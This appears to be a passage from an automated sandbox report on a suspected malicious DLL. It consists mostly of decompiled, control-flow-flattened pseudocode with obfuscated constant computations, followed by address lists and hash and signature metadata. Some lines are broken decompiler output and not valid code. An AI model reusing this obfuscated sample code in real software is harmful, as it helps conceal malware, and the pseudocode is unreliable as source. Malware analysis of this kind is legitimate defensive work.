                                                                        								if(_t1290 == 0xaff942a) {
                                                                        									E100199A4();
                                                                        									_t1290 = 0x4ce4a1;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t1290 - 0xb5fcab4;
                                                                        								if(_t1290 != 0xb5fcab4) {
                                                                        									goto L104;
                                                                        								}
                                                                        								_v100 = E1000934C(_t1290);
                                                                        								_t1290 = 0x2e7804b1;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							if(_t1435 == 0) {
                                                                        								_t1220 = E1001DB25(_v428, _v364,  &_v124, _v436,  &_v140, _v332);
                                                                        								_t1430 = _t1430 + 0x10;
                                                                        								__eflags = _t1220;
                                                                        								if(_t1220 == 0) {
                                                                        									L92:
                                                                        									_t1290 = 0xd04e189;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								E100153A7();
                                                                        								__eflags = _v116;
                                                                        								_t1290 = 0xaae0b9b;
                                                                        								if(_v116 == 0) {
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								__eflags = _v116 - 7;
                                                                        								_t1166 = 0x1347b7a7;
                                                                        								_t1290 =  ==  ? 0x1347b7a7 : 0xaae0b9b;
                                                                        								continue;
                                                                        							}
                                                                        							if(_t1290 == 0x4ce4a1) {
                                                                        								E100193C9();
                                                                        								_t1290 = 0x16c53265;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							if(_t1290 == 0xc79baa) {
                                                                        								_v104 = E10010F6D();
                                                                        								_t1290 = 0xb5fcab4;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							if(_t1290 == 0x1d0f464) {
                                                                        								_t1166 = E1001EDB9();
                                                                        								goto L109;
                                                                        							}
                                                                        							if(_t1290 == 0x28f1cb3) {
                                                                        								E10015115();
                                                                        								asm("sbb ecx, ecx");
                                                                        								_t1316 = _t1290 & 0xea302f55;
                                                                        								L15:
                                                                        								_t1290 = _t1316 + 0x17a0c50f;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							if(_t1290 != 0x4381151) {
                                                                        								goto L104;
                                                                        							}
                                                                        							if(E100137F4() == 0) {
                                                                        								E1000164C();
                                                                        								asm("sbb ecx, ecx");
                                                                        								_t1290 = (_t1290 & 0x0e0cc21c) + 0xaff942a;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							E1000164C();
                                                                        							asm("sbb ecx, ecx");
                                                                        							_t1316 = _t1290 & 0xeaee57a4;
                                                                        							goto L15;
                                                                        						}
                                                                        						__eflags = _t1290 - 0x24211e99;
                                                                        						if(__eflags > 0) {
                                                                        							__eflags = _t1290 - 0x2e7804b1;
                                                                        							if(__eflags > 0) {
                                                                        								__eflags = _t1290 - 0x2e96a45f;
                                                                        								if(_t1290 == 0x2e96a45f) {
                                                                        									E100091CD(_v468, _v192, _v320, _v132, _v200);
                                                                        									_t1430 = _t1430 + 0xc;
                                                                        									_t1290 = 0x28b834f4;
                                                                        									L103:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L104;
                                                                        								}
                                                                        								__eflags = _t1290 - 0x30bd18dd;
                                                                        								if(__eflags == 0) {
                                                                        									_push(_t1290);
                                                                        									_v148 = E100093FA(_v500, _v208, __eflags,  &_v144);
                                                                        									E1001D2CB(_v492, __eflags, _v344,  &_v148);
                                                                        									E1001C5F7(_v476, _v328, _v484, _v336, _v148);
                                                                        									_t1430 = _t1430 + 0x1c;
                                                                        									_t1290 = 0x2c7ff3b0;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t1290 - 0x33503405;
                                                                        								if(_t1290 == 0x33503405) {
                                                                        									E1001231B(_v216, _v352,  &_v88, _v360, _v508);
                                                                        									_t1430 = _t1430 + 0xc;
                                                                        									_t1290 = 0x17309102;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t1290 - 0x3448ab6b;
                                                                        								if(_t1290 != 0x3448ab6b) {
                                                                        									goto L104;
                                                                        								}
                                                                        								E1000CA1D();
                                                                        								_t1290 = 0x1d0f464;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							if(__eflags == 0) {
                                                                        								_t1290 = 0x2482a92f;
                                                                        								_v96 = _v224;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							__eflags = _t1290 - 0x2482a92f;
                                                                        							if(_t1290 == 0x2482a92f) {
                                                                        								_t1290 = 0x33503405;
                                                                        								_v92 = _v232;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							__eflags = _t1290 - 0x28928226;
                                                                        							if(__eflags == 0) {
                                                                        								_t1180 = E10018831(_v368,  &_v124, __eflags, _v540);
                                                                        								__eflags = _t1180;
                                                                        								if(_t1180 != 0) {
                                                                        								}
                                                                        								goto L92;
                                                                        							}
                                                                        							__eflags = _t1290 - 0x28b834f4;
                                                                        							if(_t1290 == 0x28b834f4) {
                                                                        								E100091CD(_v548, _v556, _v564, _v80, _v376);
                                                                        								_t1430 = _t1430 + 0xc;
                                                                        								_t1290 = 0x1314054e;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							__eflags = _t1290 - 0x2c7ff3b0;
                                                                        							if(_t1290 != 0x2c7ff3b0) {
                                                                        								goto L104;
                                                                        							}
                                                                        							_t1290 = 0x217a1233;
                                                                        							goto L2;
                                                                        						}
                                                                        						if(__eflags == 0) {
                                                                        							_t1290 = 0x2342e4cf;
                                                                        							goto L2;
                                                                        						}
                                                                        						__eflags = _t1290 - 0x1fcd18b3;
                                                                        						if(__eflags > 0) {
                                                                        							__eflags = _t1290 - 0x20b99456;
                                                                        							if(_t1290 == 0x20b99456) {
                                                                        								_t1166 = E10009AE1(_t1290);
                                                                        								goto L109;
                                                                        							}
                                                                        							__eflags = _t1290 - 0x21238f7e;
                                                                        							if(_t1290 == 0x21238f7e) {
                                                                        								E1000F813();
                                                                        								_t1290 = 0x3448ab6b;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							__eflags = _t1290 - 0x217a1233;
                                                                        							if(__eflags == 0) {
                                                                        								_push(_t1290);
                                                                        								E1000607F(_t1290, __eflags, _t1290, _v384, _v588);
                                                                        								_t1430 = _t1430 + 0x10;
                                                                        								goto L39;
                                                                        							}
                                                                        							__eflags = _t1290 - 0x2342e4cf;
                                                                        							if(__eflags != 0) {
                                                                        								goto L104;
                                                                        							}
                                                                        							_t1166 = E1001992F(__eflags);
                                                                        							__eflags = _t1166;
                                                                        							if(_t1166 == 0) {
                                                                        								goto L109;
                                                                        							}
                                                                        							_t1290 = 0x1fcd18b3;
                                                                        							while(1) {
                                                                        								L1:
                                                                        								_t1166 = 0x1347b7a7;
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        						if(__eflags == 0) {
                                                                        							E1001B01E();
                                                                        							_t1290 = 0x124b7e54;
                                                                        							while(1) {
                                                                        								L1:
                                                                        								_t1166 = 0x1347b7a7;
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        						__eflags = _t1290 - 0x190c5646;
                                                                        						if(_t1290 == 0x190c5646) {
                                                                        							E1000704B();
                                                                        							_t1290 = 0xaff942a;
                                                                        							while(1) {
                                                                        								L1:
                                                                        								_t1166 = 0x1347b7a7;
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        						__eflags = _t1290 - 0x1bfbd9ca;
                                                                        						if(_t1290 == 0x1bfbd9ca) {
                                                                        							_push(_v552);
                                                                        							_push(_v212);
                                                                        							_t1299 = _v288;
                                                                        							_push( &_v140);
                                                                        							_push( &_v132);
                                                                        							_t1265 = E10019DC0(_t1299, _v152);
                                                                        							_t1431 = _t1430 + 0x10;
                                                                        							__eflags = _t1265;
                                                                        							if(__eflags == 0) {
                                                                        								E10016536();
                                                                        								_t1424 = 0x33503405;
                                                                        								_push(_t1299);
                                                                        								_t1272 = E1000607F(_t1299, __eflags, _t1299, _v416, _v424);
                                                                        								_t1430 = _t1431 + 0x10;
                                                                        								_t1397 = _t1272;
                                                                        								goto L44;
                                                                        							}
                                                                        							_t1424 = 0x33503405;
                                                                        							_push(_t1299);
                                                                        							_t1277 = E1000607F(_t1299, __eflags, _t1299, _v544, _v440);
                                                                        							_t1430 = _t1431 + 0x10;
                                                                        							_t1397 = _t1277;
                                                                        							_t1290 = 0x679c612;
                                                                        							while(1) {
                                                                        								L1:
                                                                        								_t1166 = 0x1347b7a7;
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        						__eflags = _t1290 - 0x1c2cf691;
                                                                        						if(_t1290 == 0x1c2cf691) {
                                                                        							_t1278 = E10014E4B( &_v68, _v160, _v228, _v472);
                                                                        							_t1430 = _t1430 + 0xc;
                                                                        							__eflags = _t1278;
                                                                        							if(_t1278 == 0) {
                                                                        								L64:
                                                                        								_t1290 = 0x20b99456;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							_v112 =  &_v68;
                                                                        							_v108 = E1000D013( &_v68, _v172, _v220);
                                                                        							_t1290 = 0xa42f83d;
                                                                        							goto L1;
                                                                        						}
                                                                        						__eflags = _t1290 - 0x1d3feeae;
                                                                        						if(__eflags != 0) {
                                                                        							goto L104;
                                                                        						}
                                                                        						_push(_t1290);
                                                                        						_push(_t1290);
                                                                        						_t1284 = E1001E0D0(_t1397, __eflags);
                                                                        						__eflags = _t1284;
                                                                        						if(_t1284 == 0) {
                                                                        							_t1290 = _t1424;
                                                                        							goto L103;
                                                                        						}
                                                                        						goto L64;
                                                                        						L104:
                                                                        						__eflags = _t1290 - 0x24c87c39;
                                                                        					} while (_t1290 != 0x24c87c39);
                                                                        					goto L109;
                                                                        				}
                                                                        			}




















































































































































































                                                                        0x1000e163
                                                                        0x1000e16e
                                                                        0x1000e171
                                                                        0x1000e175
                                                                        0x1000e17d
                                                                        0x1000e188
                                                                        0x1000e193
                                                                        0x1000e19e
                                                                        0x1000e1a9
                                                                        0x1000e1b4
                                                                        0x1000e1bc
                                                                        0x1000e1c4
                                                                        0x1000e1cf
                                                                        0x1000e1da
                                                                        0x1000e1e5
                                                                        0x1000e1f0
                                                                        0x1000e1fb
                                                                        0x1000e211
                                                                        0x1000e218
                                                                        0x1000e223
                                                                        0x1000e22a
                                                                        0x1000e235
                                                                        0x1000e240
                                                                        0x1000e24b
                                                                        0x1000e256
                                                                        0x1000e261
                                                                        0x1000e274
                                                                        0x1000e275
                                                                        0x1000e27c
                                                                        0x1000e284
                                                                        0x1000e28f
                                                                        0x1000e29a
                                                                        0x1000e2ae
                                                                        0x1000e2bd
                                                                        0x1000e2c4
                                                                        0x1000e2cf
                                                                        0x1000e2da
                                                                        0x1000e2e2
                                                                        0x1000e2ed
                                                                        0x1000e2f8
                                                                        0x1000e303
                                                                        0x1000e30e
                                                                        0x1000e319
                                                                        0x1000e324
                                                                        0x1000e32f
                                                                        0x1000e337
                                                                        0x1000e33f
                                                                        0x1000e349
                                                                        0x1000e34d
                                                                        0x1000e355
                                                                        0x1000e35d
                                                                        0x1000e365
                                                                        0x1000e369
                                                                        0x1000e371
                                                                        0x1000e379
                                                                        0x1000e38f
                                                                        0x1000e394
                                                                        0x1000e39b
                                                                        0x1000e3a6
                                                                        0x1000e3b1
                                                                        0x1000e3c1
                                                                        0x1000e3c7
                                                                        0x1000e3cf
                                                                        0x1000e3d7
                                                                        0x1000e3df
                                                                        0x1000e3ea
                                                                        0x1000e3f5
                                                                        0x1000e400
                                                                        0x1000e412
                                                                        0x1000e417
                                                                        0x1000e420
                                                                        0x1000e42b
                                                                        0x1000e43e
                                                                        0x1000e441
                                                                        0x1000e442
                                                                        0x1000e449
                                                                        0x1000e454
                                                                        0x1000e45c
                                                                        0x1000e467
                                                                        0x1000e472
                                                                        0x1000e47d
                                                                        0x1000e488
                                                                        0x1000e493
                                                                        0x1000e49e
                                                                        0x1000e4a9
                                                                        0x1000e4b4
                                                                        0x1000e4bf
                                                                        0x1000e4c7
                                                                        0x1000e4d2
                                                                        0x1000e4dd
                                                                        0x1000e4e8
                                                                        0x1000e4f0
                                                                        0x1000e4fb
                                                                        0x1000e503
                                                                        0x1000e50b
                                                                        0x1000e510
                                                                        0x1000e518
                                                                        0x1000e520
                                                                        0x1000e52b
                                                                        0x1000e536
                                                                        0x1000e541
                                                                        0x1000e54c
                                                                        0x1000e557
                                                                        0x1000e562
                                                                        0x1000e56d
                                                                        0x1000e578
                                                                        0x1000e58b
                                                                        0x1000e592
                                                                        0x1000e59d
                                                                        0x1000e5b3
                                                                        0x1000e5c2
                                                                        0x1000e5c9
                                                                        0x1000e5d4
                                                                        0x1000e5e8
                                                                        0x1000e5f1
                                                                        0x1000e5fc
                                                                        0x1000e604
                                                                        0x1000e60f
                                                                        0x1000e617
                                                                        0x1000e61f
                                                                        0x1000e627
                                                                        0x1000e62f
                                                                        0x1000e637
                                                                        0x1000e64b
                                                                        0x1000e650
                                                                        0x1000e662
                                                                        0x1000e669
                                                                        0x1000e674
                                                                        0x1000e688
                                                                        0x1000e68d
                                                                        0x1000e694
                                                                        0x1000e69f
                                                                        0x1000e6b4
                                                                        0x1000e6b7
                                                                        0x1000e6b8
                                                                        0x1000e6bf
                                                                        0x1000e6ca
                                                                        0x1000e6d5
                                                                        0x1000e6e0
                                                                        0x1000e6eb
                                                                        0x1000e701
                                                                        0x1000e708
                                                                        0x1000e713
                                                                        0x1000e71b
                                                                        0x1000e723
                                                                        0x1000e730
                                                                        0x1000e734
                                                                        0x1000e73c
                                                                        0x1000e747
                                                                        0x1000e752
                                                                        0x1000e762
                                                                        0x1000e769
                                                                        0x1000e774
                                                                        0x1000e77f
                                                                        0x1000e787
                                                                        0x1000e792
                                                                        0x1000e79d
                                                                        0x1000e7a8
                                                                        0x1000e7b3
                                                                        0x1000e7be
                                                                        0x1000e7c9
                                                                        0x1000e7da
                                                                        0x1000e7e1
                                                                        0x1000e7ec
                                                                        0x1000e7ff
                                                                        0x1000e806
                                                                        0x1000e811
                                                                        0x1000e824
                                                                        0x1000e82b
                                                                        0x1000e838
                                                                        0x1000e84c
                                                                        0x1000e851
                                                                        0x1000e85a
                                                                        0x1000e861
                                                                        0x1000e869
                                                                        0x1000e874
                                                                        0x1000e886
                                                                        0x1000e88b
                                                                        0x1000e894
                                                                        0x1000e89f
                                                                        0x1000e8aa
                                                                        0x1000e8b5
                                                                        0x1000e8c0
                                                                        0x1000e8cb
                                                                        0x1000e8d6
                                                                        0x1000e8de
                                                                        0x1000e8e6
                                                                        0x1000e8f1
                                                                        0x1000e904
                                                                        0x1000e905
                                                                        0x1000e914
                                                                        0x1000e91b
                                                                        0x1000e926
                                                                        0x1000e931
                                                                        0x1000e939
                                                                        0x1000e941
                                                                        0x1000e94c
                                                                        0x1000e957
                                                                        0x1000e95f
                                                                        0x1000e96a
                                                                        0x1000e975
                                                                        0x1000e97d
                                                                        0x1000e985
                                                                        0x1000e98a
                                                                        0x1000e992
                                                                        0x1000e99a
                                                                        0x1000e9a5
                                                                        0x1000e9ad
                                                                        0x1000e9b8
                                                                        0x1000e9c0
                                                                        0x1000e9c8
                                                                        0x1000e9d2
                                                                        0x1000e9d6
                                                                        0x1000e9de
                                                                        0x1000e9e9
                                                                        0x1000e9f0
                                                                        0x1000e9fb
                                                                        0x1000ea06
                                                                        0x1000ea0e
                                                                        0x1000ea16
                                                                        0x1000ea24
                                                                        0x1000ea28
                                                                        0x1000ea30
                                                                        0x1000ea3b
                                                                        0x1000ea4e
                                                                        0x1000ea55
                                                                        0x1000ea5d
                                                                        0x1000ea68
                                                                        0x1000ea73
                                                                        0x1000ea7e
                                                                        0x1000ea89
                                                                        0x1000ea94
                                                                        0x1000ea9f
                                                                        0x1000eaaa
                                                                        0x1000eab7
                                                                        0x1000eabf
                                                                        0x1000eace
                                                                        0x1000ead1
                                                                        0x1000ead5
                                                                        0x1000eada
                                                                        0x1000eae2
                                                                        0x1000eaed
                                                                        0x1000eaf5
                                                                        0x1000eb07
                                                                        0x1000eb0e
                                                                        0x1000eb19
                                                                        0x1000eb24
                                                                        0x1000eb2f
                                                                        0x1000eb3a
                                                                        0x1000eb45
                                                                        0x1000eb4c
                                                                        0x1000eb57
                                                                        0x1000eb62
                                                                        0x1000eb6d
                                                                        0x1000eb78
                                                                        0x1000eb83
                                                                        0x1000eb8b
                                                                        0x1000eb90
                                                                        0x1000eb98
                                                                        0x1000eba0
                                                                        0x1000eba8
                                                                        0x1000ebb0
                                                                        0x1000ebbd
                                                                        0x1000ebbe
                                                                        0x1000ebc2
                                                                        0x1000ebca
                                                                        0x1000ebd2
                                                                        0x1000ebda
                                                                        0x1000ebe2
                                                                        0x1000ebea
                                                                        0x1000ebf2
                                                                        0x1000ebfa
                                                                        0x1000ec05
                                                                        0x1000ec10
                                                                        0x1000ec1b
                                                                        0x1000ec26
                                                                        0x1000ec2e
                                                                        0x1000ec33
                                                                        0x1000ec41
                                                                        0x1000ec45
                                                                        0x1000ec4d
                                                                        0x1000ec58
                                                                        0x1000ec60
                                                                        0x1000ec6b
                                                                        0x1000ec76
                                                                        0x1000ec7e
                                                                        0x1000ec89
                                                                        0x1000ec94
                                                                        0x1000ec9f
                                                                        0x1000ecaa
                                                                        0x1000ecb5
                                                                        0x1000ecc0
                                                                        0x1000ecc8
                                                                        0x1000ecd3
                                                                        0x1000ecde
                                                                        0x1000ece9
                                                                        0x1000ecf4
                                                                        0x1000ecff
                                                                        0x1000ed0a
                                                                        0x1000ed15
                                                                        0x1000ed1d
                                                                        0x1000ed28
                                                                        0x1000ed30
                                                                        0x1000ed3d
                                                                        0x1000ed43
                                                                        0x1000ed50
                                                                        0x1000ed58
                                                                        0x1000ed6c
                                                                        0x1000ed78
                                                                        0x1000ed7f
                                                                        0x1000ed8a
                                                                        0x1000ed95
                                                                        0x1000eda0
                                                                        0x1000eda8
                                                                        0x1000edbd
                                                                        0x1000edbe
                                                                        0x1000edc5
                                                                        0x1000edd0
                                                                        0x1000edd8
                                                                        0x1000ede0
                                                                        0x1000ede8
                                                                        0x1000edf0
                                                                        0x1000edf8
                                                                        0x1000ee15
                                                                        0x1000ee1c
                                                                        0x1000ee27
                                                                        0x1000ee3a
                                                                        0x1000ee41
                                                                        0x1000ee4c
                                                                        0x1000ee57
                                                                        0x1000ee5f
                                                                        0x1000ee6a
                                                                        0x1000ee72
                                                                        0x1000ee82
                                                                        0x1000ee86
                                                                        0x1000ee8e
                                                                        0x1000ef5c
                                                                        0x1000f3ab
                                                                        0x1000f3b1
                                                                        0x1000f45a
                                                                        0x1000f465
                                                                        0x1000f473
                                                                        0x1000f47a
                                                                        0x1000f482
                                                                        0x1000f483
                                                                        0x1000f488
                                                                        0x1000f48b
                                                                        0x1000f48d
                                                                        0x1000f4d5
                                                                        0x1000f4e1
                                                                        0x1000f4f8
                                                                        0x1000f508
                                                                        0x1000f50d
                                                                        0x1000f510
                                                                        0x00000000
                                                                        0x1000f510
                                                                        0x1000f496
                                                                        0x1000f4ad
                                                                        0x1000f4ba
                                                                        0x1000f4bf
                                                                        0x1000f4c2
                                                                        0x1000f4c4
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f3b7
                                                                        0x1000f3bd
                                                                        0x1000f419
                                                                        0x1000f41e
                                                                        0x1000f421
                                                                        0x1000f423
                                                                        0x1000f3ec
                                                                        0x1000f3ec
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x00000000
                                                                        0x1000ef5c
                                                                        0x1000ef5c
                                                                        0x1000f43c
                                                                        0x1000f449
                                                                        0x1000f450
                                                                        0x00000000
                                                                        0x1000f450
                                                                        0x1000f3bf
                                                                        0x1000f3c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000f3df
                                                                        0x1000f3e0
                                                                        0x1000f3e1
                                                                        0x1000f3e8
                                                                        0x1000f3ea
                                                                        0x1000f3f6
                                                                        0x00000000
                                                                        0x1000f3f6
                                                                        0x00000000
                                                                        0x1000f7c7
                                                                        0x1000f7c7
                                                                        0x1000f7c7
                                                                        0x00000000
                                                                        0x1000f7d3

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $#x$(1$0G$2N$5h$6N$;l$@P$B$EA$Lw$N$T5$Ue.$X$]1$b)$g@$j:$lK$ly$mU$o$q2$s4$v^$y?${$}L$}o$~|$4$_
                                                                        • API String ID: 0-2583851105
                                                                        • Opcode ID: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
                                                                        • Instruction ID: 09289fdc9c065f3b08f6dc9904ee957473f24b9c187b49a6f0bb080dac621220
                                                                        • Opcode Fuzzy Hash: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
                                                                        • Instruction Fuzzy Hash: DED202715093818BE3B8CF25C58ABDFBBE1FB84344F10891DE59A86260DBB59949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 94%
                                                                        			E1000ADCE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
                                                                        				intOrPtr* _v4;
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				intOrPtr* _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				signed int _v120;
                                                                        				signed int _v124;
                                                                        				signed int _v128;
                                                                        				signed int _v132;
                                                                        				signed int _v136;
                                                                        				signed int _v140;
                                                                        				signed int _v144;
                                                                        				signed int _v148;
                                                                        				signed int _v152;
                                                                        				signed int _v156;
                                                                        				signed int _v160;
                                                                        				signed int _v164;
                                                                        				signed int _v168;
                                                                        				signed int _v172;
                                                                        				signed int _v176;
                                                                        				signed int _v180;
                                                                        				signed int _v184;
                                                                        				signed int _v188;
                                                                        				signed int _v192;
                                                                        				signed int _v196;
                                                                        				signed int _v200;
                                                                        				signed int _v204;
                                                                        				signed int _v208;
                                                                        				signed int _v212;
                                                                        				signed int _v216;
                                                                        				unsigned int _v220;
                                                                        				signed int _v224;
                                                                        				signed int _v228;
                                                                        				signed int _v232;
                                                                        				signed int _v236;
                                                                        				signed int _v240;
                                                                        				signed int _v244;
                                                                        				signed int _v248;
                                                                        				signed int _v252;
                                                                        				signed int _v256;
                                                                        				signed int _v260;
                                                                        				signed int _v264;
                                                                        				signed int _v268;
                                                                        				signed int _v272;
                                                                        				signed int _v276;
                                                                        				signed int _v280;
                                                                        				signed int _v284;
                                                                        				signed int _v288;
                                                                        				signed int _v292;
                                                                        				signed int _v296;
                                                                        				signed int _v300;
                                                                        				signed int _v304;
                                                                        				signed int _v308;
                                                                        				signed int _v312;
                                                                        				signed int _v316;
                                                                        				signed int _v320;
                                                                        				signed int _v324;
                                                                        				signed int _v328;
                                                                        				signed int _v332;
                                                                        				signed int _v336;
                                                                        				intOrPtr* _v340;
                                                                        				intOrPtr* _v344;
                                                                        				void* _t776;
                                                                        				intOrPtr* _t779;
                                                                        				intOrPtr* _t782;
                                                                        				intOrPtr* _t794;
                                                                        				intOrPtr _t799;
                                                                        				intOrPtr _t800;
                                                                        				void* _t806;
                                                                        				void* _t808;
                                                                        				intOrPtr _t810;
                                                                        				intOrPtr* _t811;
                                                                        				intOrPtr* _t815;
                                                                        				signed int _t824;
                                                                        				void* _t833;
                                                                        				signed int _t834;
                                                                        				void* _t876;
                                                                        				intOrPtr _t879;
                                                                        				signed int _t892;
                                                                        				signed int _t893;
                                                                        				signed int _t894;
                                                                        				signed int _t895;
                                                                        				signed int _t896;
                                                                        				signed int _t897;
                                                                        				signed int _t898;
                                                                        				signed int _t899;
                                                                        				signed int _t900;
                                                                        				signed int _t901;
                                                                        				signed int _t902;
                                                                        				signed int _t903;
                                                                        				signed int _t904;
                                                                        				signed int _t905;
                                                                        				signed int _t906;
                                                                        				signed int _t907;
                                                                        				signed int _t908;
                                                                        				signed int _t909;
                                                                        				signed int _t911;
                                                                        				intOrPtr* _t917;
                                                                        				void* _t919;
                                                                        				void* _t921;
                                                                        				void* _t923;
                                                                        
                                                                        				_t815 = _a24;
                                                                        				_push(_a40);
                                                                        				_push(_a36 & 0x0000ffff);
                                                                        				_push(_a32);
                                                                        				_push(_a28);
                                                                        				_push(_t815);
                                                                        				_push(_a20);
                                                                        				_push(_a16);
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_a36 & 0x0000ffff);
                                                                        				_v16 = 0x698fe5;
                                                                        				_v4 = 0;
                                                                        				_t817 = 0;
                                                                        				_v20 = 0;
                                                                        				_t917 = 0;
                                                                        				_v12 = 0x6421c2;
                                                                        				_t919 =  &_v344 + 0x30;
                                                                        				_v8 = 0x4b39f;
                                                                        				_v116 = 0xe145;
                                                                        				_t911 = 0x2a775466;
                                                                        				_v32 = 0;
                                                                        				_t892 = 0x2c;
                                                                        				_v344 = 0;
                                                                        				_v116 = _v116 * 0x68;
                                                                        				_v116 = _v116 ^ 0x005b8408;
                                                                        				_v252 = 0x1a30;
                                                                        				_v252 = _v252 | 0xfbfb3abf;
                                                                        				_v252 = _v252 ^ 0xfbfb3aac;
                                                                        				_v308 = 0xd892;
                                                                        				_v308 = _v308 | 0x24cee9b5;
                                                                        				_v308 = _v308 << 0xe;
                                                                        				_v308 = _v308 ^ 0x3a963db2;
                                                                        				_v308 = _v308 ^ 0x84fbfd7a;
                                                                        				_v144 = 0xe41e;
                                                                        				_v144 = _v144 ^ 0xfb5a10bc;
                                                                        				_v144 = _v144 >> 2;
                                                                        				_v144 = _v144 ^ 0x3ed63d28;
                                                                        				_v292 = 0xf2f6;
                                                                        				_v292 = _v292 + 0xffff8fc8;
                                                                        				_v292 = _v292 / _t892;
                                                                        				_v292 = _v292 + 0x4f67;
                                                                        				_v292 = _v292 ^ 0x0000125f;
                                                                        				_v44 = 0x5769;
                                                                        				_v44 = _v44 + 0x7821;
                                                                        				_v44 = _v44 ^ 0x0040cf8a;
                                                                        				_v208 = 0xa2da;
                                                                        				_v208 = _v208 + 0xffffda26;
                                                                        				_v208 = _v208 | 0x6bc8fc84;
                                                                        				_v208 = _v208 ^ 0x6bccfd84;
                                                                        				_v100 = 0x8619;
                                                                        				_t893 = 0x6e;
                                                                        				_v100 = _v100 / _t893;
                                                                        				_v100 = _v100 ^ 0x04000138;
                                                                        				_v236 = 0x85ca;
                                                                        				_v236 = _v236 + 0xf775;
                                                                        				_v236 = _v236 >> 0xc;
                                                                        				_v236 = _v236 | 0xc3010237;
                                                                        				_v236 = _v236 ^ 0xc3090237;
                                                                        				_v60 = 0x5f94;
                                                                        				_v60 = _v60 + 0xffff918e;
                                                                        				_v60 = _v60 ^ 0xfffff322;
                                                                        				_v300 = 0xef4d;
                                                                        				_v300 = _v300 | 0xf95e9216;
                                                                        				_t894 = 0x1d;
                                                                        				_v300 = _v300 * 0x78;
